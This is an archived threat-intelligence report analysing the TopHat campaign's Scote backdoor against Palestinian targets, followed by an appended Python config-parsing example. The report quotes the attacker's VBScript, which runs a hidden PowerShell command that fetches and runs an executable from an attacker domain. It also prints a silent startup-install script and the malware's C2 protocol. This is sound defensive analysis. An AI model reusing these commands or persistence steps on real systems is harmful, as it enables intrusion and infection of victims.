{
	"id": "01bb29c7-2755-4ac2-8f5b-9b0bc686f699",
	"created_at": "2026-04-06T00:12:27.796051Z",
	"updated_at": "2026-04-10T03:19:56.877629Z",
	"deleted_at": null,
	"sha1_hash": "d865976c95c90673e0517ca8f4ebfb0c386e593b",
	"title": "The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2414317,
	"plain_text": "The TopHat Campaign: Attacks Within The Middle East Region Using\r\nPopular Third-Party Services\r\nBy Josh Grunzweig\r\nPublished: 2018-01-26 · Archived: 2026-04-05 23:10:07 UTC\r\nSummary\r\nIn recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging the popular third-party services Google+,\r\nPastebin, and bit.ly. Attackers used Arabic-language decoy documents related to current events within the Palestinian\r\nTerritories as lures to entice victims to open them and subsequently be infected by the malware. There is data, detailed later, indicating that these\r\nattacks are targeting individuals or organizations within the Palestinian Territories.\r\nThe attacks themselves are deployed via four different means: two involving malicious RTF files, one involving self-extracting Windows executables, and the final one using RAR archives.\r\nThe ultimate payload is a new malware family that we have dubbed “Scote” based on strings we found within the malware\r\nsamples. Scote provides backdoor access for an attacker and we have observed it collecting command and control (C2)\r\ninformation from Pastebin links as well as Google+ profiles. The bit.ly links obscured the C2 URLs so victims could not\r\nevaluate the legitimacy of the final site prior to clicking it. We are calling their recent activity the “TopHat” campaign.\r\nAdditionally, we tracked the apparent author testing their malware against numerous security products. Our tracking of this\r\ntesting enabled us both to note changes made over time and to observe other malware being submitted by the author.\r\nThis other submitted malware overlapped with the previously reported DustySky campaign. 
In addition to testing\r\nmalicious RTFs that deploy the Scote malware family, the same attacker was witnessed submitting files that appear to be\r\nnew variants of the DustySky Core malware discussed in their report.\r\nMalware Delivery Techniques\r\nThe attacks we found within the TopHat campaign began in early September 2017. In a few instances, original filenames of\r\nthe identified samples were written in Arabic. Specifically, we found the following names during this investigation:\r\n \r\nOriginal Filename Translation\r\nالسلطة بحل يبدا الرئيس.rar The president begins dissolving power.rar\r\nالسلطة بحل يبدا الرئيس.scr The president begins dissolving power.scr\r\nاليوم اجتماع محضر.doc Minutes of today's meeting.doc\r\n \r\nWe observed a series of techniques used to deploy the Scote malware family. To date, at a high level, we have observed the\r\nfollowing four techniques, each of which we delve into in this blog:\r\nFigure 1 Malware delivery techniques\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 1 of 14\n\nTechnique #1 – RTFs Leveraging Bit.ly\r\nThe first technique encountered included the use of malicious RTFs that made an HTTP request to the below URL, which then\r\nredirected to the below malicious site (note the intentional typo of “storage”):\r\n \r\nURL Redirect\r\nhttp://bit[.]ly/2y3XL3P http://storgemydata[.]website/v.dat\r\n \r\nThis ‘v.dat’ file was in turn a PE32 executable file that has the following SHA256 hash:\r\nSHA256 862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5\r\n \r\nLooking at the publicly available statistics for the bit[.]ly redirect, we see the majority of activity taking place in late\r\nOctober of this year. Additionally, we see the majority of the downloads originating from both the Palestinian Territories as\r\nwell as the United Arab Emirates. 
This provides clues as to who the victims are or where attackers may originate from.\r\n \r\nFigure 2 Statistics surrounding malicious redirect\r\n \r\nTechnique #2 – Don’t Kill My Cat Attacks\r\nThe second technique uses an interesting tactic that Unit 42 has not seen before. Specifically, it makes use of an attack\r\ndiscussed in July of this year called Don’t Kill My Cat or DKMC. DKMC can enable an attacker to load a legitimate bitmap\r\n(BMP) file that contains shellcode within it. The DKMC tool and more information about this tactic may be found here.\r\nThis specific attack begins with a malicious executable file that downloads a legitimate BMP file that looks like the\r\nfollowing:\r\nFigure 3 Malicious BMP image retrieved by downloader\r\nIt should be noted that this is the same image used in the DKMC presentation. It would appear that the attackers simply used\r\nthe default settings of this particular program.\r\nThis BMP file is loaded as shellcode. The first six bytes are read as the following instructions:\r\nseg000:00000000                 inc     edx\r\nseg000:00000001                 dec     ebp\r\nseg000:00000002                 jmp     loc_34D8B\r\nCode execution is then redirected to embedded shellcode.\r\nThe underlying shellcode is decrypted at runtime using a 4-byte XOR key of 0x3C0922F0. The shellcode eventually loads\r\nan embedded UPX-packed executable and redirects execution to this file. This file is an instance of the Scote malware\r\nfamily. The size of the payload and the fact that it is embedded within the BMP file explains the large amount of distortion\r\nwitnessed in the image above. In other words, the distortion witnessed is actually the shellcode and the embedded Scote\r\nmalware. 
As this data is converted within a BMP image, we’re left with what essentially looks like random pixels.\r\nTechnique #3 – RTFs Exploiting CVE-2017-0199\r\nThis technique begins with malicious RTF files that make use of CVE-2017-0199, a Microsoft Office/WordPad remote code\r\nexecution (RCE) vulnerability patched by Microsoft in September 2017. When opened, the following lure is displayed to the\r\nvictim (translation on the right provided by Google Translate):\r\nFigure 4 Lure used by malicious RTFs\r\nThis lure is related to an event reported in late August where President Mahmoud Abbas announced plans to convert a\r\nplanned presidential palace into a national library. This is consistent with the timeline of the attacks we witnessed, as the\r\nevent took place roughly a week before we observed these malware samples.\r\nThese RTFs will also download a file from the following location:\r\nstorgemydata[.]website/update-online/office-update.rtf\r\nNote that this is the same domain witnessed in the redirect used in technique #1. 
While the downloaded file has an RTF\r\nextension, it is in fact a VBScript with the following contents:\r\n\u003cscript language=\"VBScript\"\u003e\r\nwindow.moveTo -4000, -4000\r\n  Set vFwhEtGt = CreateObject(\"Wscript.Shell\")\r\n  Set lfTi = CreateObject(\"Scripting.FileSystemObject\")\r\n  If 1=1 Then\r\n    vFwhEtGt.Run (\"PowerShell.exe -WindowStyle Hidden $d=$env:userprofile+'\\\\start Menu\\\\Programs\\\\Startup\\\\\\12330718701ac441736a55e3ee3cx996.exe';(New-Object System.Net.WebClient).DownloadFile('http://storgemydata[.]website/x.exe',$d);Start-Process $d;\"),0\r\nEnd If\r\n  window.close()\r\n\u003c/script\u003e\r\nThis VBScript executes a PowerShell command that will download and execute a file from the following location:\r\nhttp://storgemydata[.]website/x.exe\r\nThis final ‘x.exe’ executable file is an instance of the Scote malware family.\r\nTechnique #4 – Self-extracting Executables\r\nThe last technique makes use of self-extracting executable files to both load a decoy document and spawn an instance of\r\nScote. When the malware is run it will drop a file with an original filename of ‘abbas.rtf’, which contains the following\r\ncontents:\r\nFigure 5 TopHat decoy document with rough translation\r\nAdditionally, an instance of Scote is loaded on the victim machine.\r\nThe decoy document used discusses the potential dissolving of the Palestinian Authority (PA) by President Mahmoud\r\nAbbas. 
This particular event was reported on August 23, 2017, just before Trump administration officials were set to visit\r\nRamallah.\r\nLater in this blog, we will see the attackers leveraging this Donald Trump connection even more.\r\nWe originally witnessed these specific RTFs on September 6th, 2017, just two weeks after this event.\r\nBased on the observed statistics from the malicious redirect found in technique #1, as well as the content of this decoy\r\ndocument, we can infer that at least some of the targeted victims may very well be located in the Palestinian Territories.\r\nAnalysis of the Scote Malware\r\nThe Scote malware family employs a series of techniques and tricks when it is originally loaded onto a victim machine.\r\nHowever, underneath the various layers of obfuscation lies a fairly straightforward malware family that abuses legitimate\r\nthird-party online services to host its C2 information.\r\nWhen Scote is first run, it will decode embedded configuration information. This embedded configuration information\r\ncontains URLs to third-party online services, such as Pastebin postings or Google+ accounts. Scote will use this information\r\nto attempt to retrieve data from these URLs and parse it, such as in the following example:\r\nFigure 6 Google+ profile used by Scote malware\r\nIt should be noted that a total of three Google+ profiles have been observed and all of these profiles contained the name\r\n‘Donald Trump’. 
This is interesting given the topics we saw being used to deliver the Scote malware family within the\r\nTopHat campaign, many of which also referred to the President of the Palestinian Territories.\r\nAfter C2 information is retrieved by Scote, it will communicate with these servers and can accept commands that perform\r\nthe following actions:\r\nKill the Scote malware\r\nRun ‘ipconfig’ on the victim and return results\r\nRun ‘cmd.exe /C systeminfo’ and return results\r\nLoad a DLL that is downloaded from a C2\r\nFor more information about the Scote malware family, please refer to the Appendix.\r\nIdentified Malware Testing Against Security Solutions\r\nWhen looking at the malicious RTF documents in technique #4 that exploit CVE-2017-0199 we found that all of the files we\r\nencountered were submitted in close succession to an online service that tests them against multiple\r\nsecurity products. Additionally, the original filenames of these files implied that an attacker may have been testing their\r\nmalware against one or more security products.\r\nSHA256 Filename Date\r\ncb6cf34853351ba62d4dd2c609d6a41c618881670d5652ffa7ddf5496e4693f0 test1.rtf 2017-09-06 15:00:08 UTC\r\n8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64 xx.rtf 2017-09-06 15:00:53 UTC\r\nd302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5 xx2.rtf 2017-09-06 15:01:49 UTC\r\n1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1 xx2.rtf 2017-09-06 15:05:30 UTC\r\nd409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9 xx2.rtf 2017-09-06 15:08:32 UTC\r\naa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c xx2.rtf 2017-09-06 15:18:14 UTC\r\n \r\nAs we can see by the timestamps shown above, the files were submitted anywhere from one to ten minutes apart from each\r\nother. 
Looking closer at these files we can see what changed between iterations.\r\nFigure 7 Modifications made to RTFs by attacker\r\nAs it so happens, the first RTF file this attacker attempted to test had very few detections. However, this was due to the fact\r\nthat the attempts at commenting out the backslashes caused this file to not open at all within Microsoft Word. When you\r\nattempt to open this file, Word will simply render the content as it would a normal text file.\r\nIt appeared that the attacker realized this, as he or she quickly corrected this, and proceeded to make very minor\r\nmodifications to try and evade security products. However, none of the modifications were terribly effective: all of these\r\nsamples were found to have a high rate of detection.\r\nAs we can see in Figure 7, the attacker made multiple very small modifications between each iteration, specifically around\r\nthe ‘\\object\\objlink\\objupdate’ string. This particular control allows the malicious content to be loaded by the RTF, as\r\noutlined in an analysis by MDSec. As such, the attacker likely felt this was what resulted in the RTF being detected as\r\nmalicious, and attempted to obfuscate it.\r\nOverlap with the DustySky Campaign\r\nBesides being able to witness the attacker testing his or her malware, we noticed something interesting when we were\r\nlooking at the individual who submitted these files. 
About a month and a half after these files were submitted, the same\r\nindividual submitted the following three samples that we attribute to the DustySky campaign:\r\n202d1d51254eb13c64d143c387a87c5e7ce97ba3dcfd12dd202a640439a9ea3b\r\nd18e09debde4748163efa25817b197f3ff0414d2255f401b625067669e8e571e\r\n3e4d0ffdde0b5db2a0a526730ff63908cefc9634f07ec027c478c123912554bb\r\nDustySky is a campaign published by ClearSky in January 2016 that discusses a politically motivated group that primarily\r\ntargets organizations within the Middle East. The group has remained active since they were originally reported on,\r\nincluding a campaign identified by Unit 42 earlier this year. These files appear to be new variants of the DustySky Core\r\nmalware discussed in the report and they communicate with the following domains over HTTPS:\r\nfulltext.yourtrap[.]com\r\nchecktest.www1[.]biz\r\nThe malware is dropped via a self-extracting executable, which contains an empty decoy document with the following\r\nname:\r\ndocx.انباء عن احتجاز الرٔييس عباس في السعودية واعالن دحالن رٔييسا لفلسطني\r\nThis can roughly be translated to the following:\r\nNews of the detention of President Abbas in Saudi Arabia and Dahlan's declaration as President of Palestine.docx\r\nAs we can see, the name of this decoy document is consistent with the lures witnessed in the TopHat campaign.\r\nConclusion\r\nAttackers often are found to leverage current events to accomplish their goal. In the TopHat campaign, we have observed yet\r\nanother instance where a threat actor looks to be using political events to target individuals or organizations within the\r\nPalestine region. 
This campaign leveraged multiple methods to deploy a previously unseen malware family, including some\r\nrelatively new tactics in the case of using a legitimate BMP file to load malicious shellcode.\r\nThe new malware family, which we have dubbed Scote, employs various tricks and tactics to evade detection, but provides\r\nrelatively little functionality to the attackers once deployed. This may well be due to the fact it is still under active\r\ndevelopment. Scote uses some interesting methods when retrieving C2 information, including the use of Pastebin and\r\nGoogle+ accounts, as well as using bit.ly links to obscure the C2 URLs so victims could not evaluate the legitimacy of the\r\nfinal site prior to clicking it.\r\nThe TopHat campaign was found to overlap with the previously reported DustySky campaign when\r\nthe attacker was identified to be submitting their files for testing purposes. Unit 42 will continue to track and monitor this\r\nthreat and will report on any developments that occur.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nThe Scote malware family and the TopHat campaign have been tagged within AutoFocus for continued tracking\r\nDustySky is tagged within AutoFocus for ongoing tracking\r\nAll malicious domains discovered within this campaign have been appropriately flagged as malware\r\nAll samples are marked malicious within WildFire\r\nTraps identifies and blocks the exploits used by the RTF files\r\nAdditionally, Google, Pastebin, and bit.ly have been notified of the malicious content being hosted on their services.\r\nAppendix\r\nIndicators of Compromise\r\nSHA256 
Hashes\r\nDomains\r\nstorgemydata[.]website\r\nScote Technical Analysis\r\nFor the technical analysis, we used the following sample:\r\nSHA256 3540c2f0765773fa0a822fcf5fed5ed2a363ad11291a66ab1b488c9a4aa857f9\r\n \r\nThis particular sample begins as a self-extracting executable. 
When run, it will drop an ‘e.exe’ sample and execute the\r\nfollowing SFX script commands:\r\nPath=%userprofile%\\start menu\\programs\\startup\\\r\nSetup=e.exe\r\nSilent=1\r\nOverwrite=1\r\nUpdate=U\r\n \r\nFor those unfamiliar with SFX commands, the series of commands above silently deploys e.exe to the startup path. It\r\nwill overwrite any instances where e.exe already exists in this path.\r\nThe ‘e.exe’ file is compiled in Delphi and has the following SHA256 hash:\r\nSHA256 9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7\r\n \r\nWhen run, ‘e.exe’ will periodically decrypt strings at runtime using a simple single-byte XOR routine. While the routine\r\nallows for different bytes to be used, the author chose to use a key of 0xFF in every observed instance.\r\nThe malware proceeds to get the address of the NtDelayExecution function from ntdll.dll. This function is used by Sleep to\r\ncause a delay in program execution. After this function address has been resolved, it will overwrite the first five bytes to jmp\r\nto a malicious function, as seen below:\r\nFigure 8 Modifications to NtDelayExecution\r\n \r\nThe malware proceeds to make a call to Sleep with an argument of 1, thus redirecting execution to this malicious function.\r\nThis is likely an attempt at thwarting anti-virus and security solutions; however, it has the adverse effect of preventing the\r\nmalware from making subsequent calls to Sleep.\r\nThis malicious function continues to decode more strings using the single-byte XOR technique. 
Additionally, it will copy the\r\nfollowing functions out of ntdll.dll for later use:\r\nZwCreateUserProcess\r\nZwAllocateVirtualMemory\r\nZwWriteVirtualMemory\r\nZwGetContextThread\r\nZwSetContextThread\r\nZwResumeThread\r\nA large blob of encrypted data is decrypted using a modified version of RC4. The following Python code may be used to\r\ndecrypt this data. The key has consistently been observed to be “qlNwuFVA9K8HpGNY6x0I”.\r\nimport sys\r\n\r\ndef rc4_crypt(data, key):\r\n  # Modified RC4: after key scheduling, j is not reset to 0 and the\r\n  # output index i starts at 0 rather than 1, so the keystream differs\r\n  # from standard RC4 and a stock implementation will not decrypt this blob.\r\n  S = list(range(256))\r\n  j = 0\r\n  out = bytearray()\r\n  for i in range(256):\r\n    j = (j + S[i] + key[i % len(key)]) % 256\r\n    S[i], S[j] = S[j], S[i]\r\n  i = 0\r\n  for byte in data:\r\n    j = (S[i % 256] + j) % 256\r\n    S[i % 256], S[j] = S[j], S[i % 256]\r\n    out.append(byte ^ S[(S[i % 256] + S[j]) % 256])\r\n    i += 1\r\n  return bytes(out)\r\n\r\nfile = sys.argv[1]\r\nwith open(file, 'rb') as f:\r\n  fd = f.read()\r\noutput = rc4_crypt(fd, b\"qlNwuFVA9K8HpGNY6x0I\")\r\nwith open(\"decrypted_data.bin\", 'wb') as f:\r\n  f.write(output)\r\n \r\nThis decrypted code is then copied to a newly allocated block of memory before execution flow is redirected to it. When this\r\nnewly decrypted code is called, it is provided with a string argument containing the path to svchost.exe.\r\nThis new code is shellcode that will eventually decrypt an executable file and inject it into a newly spawned svchost.exe\r\nprocess.\r\nThe shellcode in question reflects certain decisions by the author that demonstrate a lack of sophistication. 
For example, it\r\nwill load a series of libraries and functions using a common ROR13 technique. This technique begins with the attacker\r\ntaking a string of a library or function, such as ‘CreateProcessA’, and performing a binary ROR13 against it. In this example,\r\nthe attacker has a result of a DWORD of 0x16B3FE72. This DWORD is then typically hardcoded within the shellcode. The\r\nmalicious code then iterates through the functions of the necessary library and applies the same ROR13 technique against\r\neach function until it finds a match.\r\nThis shellcode uses the same approach; however, instead of providing the hardcoded DWORDs, it provides the\r\nclear-text library and function names, which then have the ROR13 applied. The resulting DWORD is then used.\r\nUnfortunately, this completely cancels out any obfuscation that might have originally been present.\r\nAfter the various libraries and functions are loaded, the shellcode decodes an embedded blob of data using a multi-byte\r\nXOR operation. 
The original key for this operation appears to have been ‘Houdini’, however, due to a likely mistake by the\r\nauthor, after the first iteration, a key of ‘oudini\\x00’ is used instead.\r\nThe following example Python code decodes this data found within the shellcode:\r\nimport sys\r\nfrom itertools import cycle\r\n\r\ndef xor(message, key):\r\n  # Repeating-key XOR over raw bytes\r\n  return bytes(c ^ k for c, k in zip(message, cycle(key)))\r\n\r\ndef decode(data, size):\r\n  # The first byte is XORed with 'H'; the rest of the blob uses the\r\n  # shifted key 'oudini\\x00' that results from the author's likely mistake\r\n  key = b\"oudini\\x00\"\r\n  b1 = xor(data[0:1], b\"H\")\r\n  b2 = xor(data[1:size], key)\r\n  b = b1 + b2\r\n  # Each XORed byte is then offset by 128, wrapping at 8 bits\r\n  return bytes((bite + 128) & 0xff for bite in b)\r\n\r\nfile = sys.argv[1]\r\nwith open(file, 'rb') as f:\r\n  fd = f.read()\r\nsize = 54272\r\noutput = decode(fd, size)\r\nf1 = \"embeddedShellcode.bin\"\r\nwith open(f1, 'wb') as fh:\r\n  fh.write(output)\r\n \r\nThis decoded blob is a Microsoft Windows executable that contains the Scote payload. After this blob is decoded, a new\r\ninstance of svchost.exe is spawned in a suspended state. The Scote payload is injected into this process prior to resuming it.\r\nScote begins by loading and decoding an embedded resource string. It is decoded first using base64 with a customized\r\nalphabet. The result is then base64-decoded using the traditional alphabet. 
The following alphabet is used for the first phase\r\nof decoding:\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/\r\nOnce decoded, we’re provided with the following configuration (newlines and spacing added for presentation):\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]e3HGAiPJ[/install_name]\r\n  [nick_name]4c1h7vLX[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n \r\nThe configuration is parsed to determine if there are any connection ‘param’ parameters provided. In the event that there are,\r\nScote will attempt to download the contents of these URLs via a simple GET request.\r\nThese pastebin URLs contained the following information (IPs have been defanged):\r\nscout{\r\n5.175.214[.]9:22\r\n5.175.214[.]9:23\r\n5.175.214[.]9:25\r\n5.175.214[.]9:53\r\n5.175.214[.]9:6000\r\n5.175.214[.]9:80\r\n}\r\nelite{\r\n5.175.214[.]9:5000\r\n5.175.214[.]9:443\r\n5.175.214[.]9:1434\r\n5.175.214[.]9:110\r\n5.175.214[.]9:2716\r\n5.175.214[.]9:8080\r\n}\r\n{x=c2NvdXR7DQo1LjE3NS4yMTQuOToyMg0KNS4xNzUuMjE0Ljk6MjMNCn0NCmVsaXRlew0KNS4xNzUuMjE0Ljk6NTAwMA0KNS4xN\r\n \r\nIn addition to Pastebin, some samples were found connecting to the following three Google+ 
profiles:\r\nhttps://plus.google[.]com/104518099222750189969\r\nhttps://plus.google[.]com/110228699051788231047\r\nhttps://plus.google[.]com/106456556287604120942\r\nScote takes the response from these requests and parses data within ‘scout{}’. Other Scote versions attempted to identify\r\ndata contained within ‘{x=’ and ‘}’. This data is decoded using the traditional Base64 algorithm. The results are similar to\r\nthe following (IPs have been defanged):\r\nscout{\r\n5.175.214[.]9:22\r\n5.175.214[.]9:23\r\n}\r\nelite{\r\n5.175.214[.]9:5000\r\n5.175.214[.]9:443\r\n}\r\n \r\nThis information is used for subsequent communication and these values represent the Scote malware’s C2.\r\nWhile there are a number of other configuration parameters within Scote, the connection params and the nick_name appear\r\nto be the only ones used. It’s possible that Scote is still actively being developed and the author has yet to make use of the\r\nadditional parameters provided within the configuration. A full list of identified Scote configurations may be found within\r\nthe ‘Scote Configurations’ appendix.\r\nScote checks the current running process against the following list to ensure it is running within one of them:\r\nsvchost.exe\r\nexplorer.exe\r\nchrome.exe\r\nfirefox.exe\r\niexplorer.exe\r\nopera.exe\r\nScote makes an ASM call to CPUID with an argument of 1 to query the victim’s processor information and features. This\r\ninformation is used to generate a unique 8-character hash for that victim.\r\nScote then connects to the previously retrieved C2 servers and sends the following information via TCP:\r\ncommand=scote_connection|hwid=[8 character hash]\r\nIn the example above, [8 character hash] is replaced with the victim’s unique hash. 
Scote continues to submit the following\r\ncommand periodically and will parse the response:\r\ncommand=scote_ping\r\nScote accepts the following five responses:\r\nCommand Description\r\nscote_pong No action taken by Scote\r\nscote_drop Kill the Scote malware\r\nscote_info_ipconfig Return the results of running ‘ipconfig’\r\nscote_info_systeminfo Return the results of running ‘cmd.exe /C systeminfo’\r\nscote_upgrade Accept a DLL from the remote C2 and load it.\r\n \r\nScote returns information in the following format:\r\ncommand=[command]|buffer=[data]\r\nIn the example above, [command] is replaced with the command received from the remote C2 server, and [data] is replaced\r\nwith data that has been encoded using both traditional base64 as well as base64 with the nonstandard alphabet.\r\nScote Configurations\r\n4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb\r\n[config]\r\n  [connection]\r\n    [param]https://plus.google[.]com/104518099222750189969[/param]\r\n    [param]https://plus.google[.]com/110228699051788231047[/param]\r\n    [param]https://plus.google[.]com/106456556287604120942[/param]\r\n  [/connection]\r\n  [install_name]Kh237t0P[/install_name]\r\n  [nick_name]k1et333d[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\ned9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48\r\n[config]\r\n  [connection]\r\n    
[param]https://plus.google[.]com/104518099222750189969[/param]\r\n    [param]https://plus.google[.]com/110228699051788231047[/param]\r\n    [param]https://plus.google[.]com/106456556287604120942[/param]\r\n  [/connection]\r\n  [install_name]Q2xm5ziY[/install_name]\r\n  [nick_name]hq5GyQ1D[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup\r\n  [task_startup]false[/task_startup]\r\n  [injection]false[/injection]\r\n613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]e3HGAiPJ[/install_name]\r\n  [nick_name]4c1h7vLX[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]i0c9488I[/install_name]\r\n  [nick_name]7WDyDSog[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  
[injection_process]svchost[/injection_process]\r\n0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]ZVLhWo62[/install_name]\r\n  [nick_name]b04bc9mK[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\nd0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n  [/connection]\r\n  [install_name]9OhcOo03[/install_name]\r\n  [nick_name]URt7b1zK[/nick_name]\r\n  [install_folder]temp[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]true[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n  [/connection]\r\n  [install_name]ke6Wox2L[/install_name]\r\n  [nick_name]3GlWhgi3[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]true[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]explorer[/injection_process]\r\n
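The configuration listing and the beacon reply format above lend themselves to a small triage script. The following Python is an added example written for this page, not Scote code and not Unit 42 tooling: it parses the bracket-delimited configuration into a dictionary, summarizes the C2 hosts, the install folder, the enabled persistence switches and the injection target, and decodes a command=[command]|buffer=[data] reply. The sample configuration is constructed from the first listing above (with task_startup set to true so the persistence summary is exercised); the nonstandard base64 alphabet used here (a rotation of the standard one) and the order of the two base64 layers are assumptions, since this section does not give them.

```python
# Added example for this page (not Scote code, not Unit 42 tooling).
# Parses the bracket-delimited Scote configuration format and decodes a
# 'command=...|buffer=...' reply. ASSUMPTIONS (not given in this section):
# the nonstandard base64 alphabet (here a 13-position rotation of the
# standard one) and the order of the two base64 layers.
import base64
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + '+/'
# Hypothetical nonstandard alphabet: a stand-in for the real one.
CUSTOM_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]

# Constructed sample modelled on the first configuration listed above,
# with task_startup flipped to true so the persistence summary is exercised.
SAMPLE_CONFIG = '''[config]
  [connection]
    [param]https://plus.google[.]com/104518099222750189969[/param]
    [param]https://plus.google[.]com/110228699051788231047[/param]
  [/connection]
  [install_name]Kh237t0P[/install_name]
  [nick_name]k1et333d[/nick_name]
  [install_folder]noinstall[/install_folder]
  [reg_startup]false[/reg_startup]
  [folder_startup]false[/folder_startup]
  [task_startup]true[/task_startup]
  [injection]true[/injection]
  [injection_process]svchost[/injection_process]
[/config]'''


def _store(container, name, value):
    # Repeated tags (several [param] entries) accumulate into a list.
    if name in container:
        existing = container[name]
        container[name] = existing + [value] if isinstance(existing, list) else [existing, value]
    else:
        container[name] = value


def parse_config(text):
    '''Turn [tag]value[/tag] lines into nested dicts. A bare [tag] line opens a
    section closed by [/tag]; a missing [/config], as in the listings above,
    is tolerated. Lines that are not tags (e.g. a sample hash) are skipped.'''
    root = {}
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith('[') or ']' not in line:
            continue
        if line.startswith('[/'):
            if len(stack) > 1:
                stack.pop()
            continue
        name = line[1:line.index(']')]
        close = '[/' + name + ']'
        if line.endswith(close):
            _store(stack[-1], name, line[len(name) + 2:-len(close)])
        else:
            child = {}
            _store(stack[-1], name, child)
            stack.append(child)
    return root


def triage(cfg):
    '''What an analyst wants from one config: C2 hosts (refanged), the install
    folder, which persistence switches are on, and the injection target.'''
    c = cfg['config']
    params = c.get('connection', {}).get('param', [])
    if isinstance(params, str):
        params = [params]
    hosts = sorted({p.replace('[.]', '.').split('//', 1)[-1].split('/', 1)[0] for p in params})
    persistence = [k for k in ('reg_startup', 'folder_startup', 'task_startup') if c.get(k) == 'true']
    target = c.get('injection_process') if c.get('injection') == 'true' else None
    return {'c2_hosts': hosts, 'install_folder': c.get('install_folder'),
            'persistence': persistence, 'injection_target': target}


def encode_buffer(data):
    '''Assumed layering: standard base64, then the result re-encoded with the
    custom alphabet. Used here only to build a realistic test reply.'''
    outer = base64.b64encode(base64.b64encode(data)).decode('ascii')
    return outer.translate(str.maketrans(STD_ALPHABET, CUSTOM_ALPHABET))


def decode_buffer(text):
    '''Inverse of encode_buffer; padding (=) is outside both alphabets and passes through.'''
    std = text.translate(str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET))
    return base64.b64decode(base64.b64decode(std))


def parse_reply(msg):
    '''Split command=[command]|buffer=[data] and decode the buffer. Only the
    first = of each field is a separator, so base64 padding is safe.'''
    fields = dict(part.split('=', 1) for part in msg.split('|'))
    return fields['command'], decode_buffer(fields['buffer'])


if __name__ == '__main__':
    print(triage(parse_config(SAMPLE_CONFIG)))
    reply = 'command=scote_info_ipconfig|buffer=' + encode_buffer(b'Windows IP Configuration')
    print(parse_reply(reply))
```

To run this against a real sample, pass the decoded configuration text to parse_config and substitute the alphabet recovered from the binary for CUSTOM_ALPHABET; if a captured buffer does not decode under the assumed layering, reverse the order of the two decode steps in decode_buffer.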
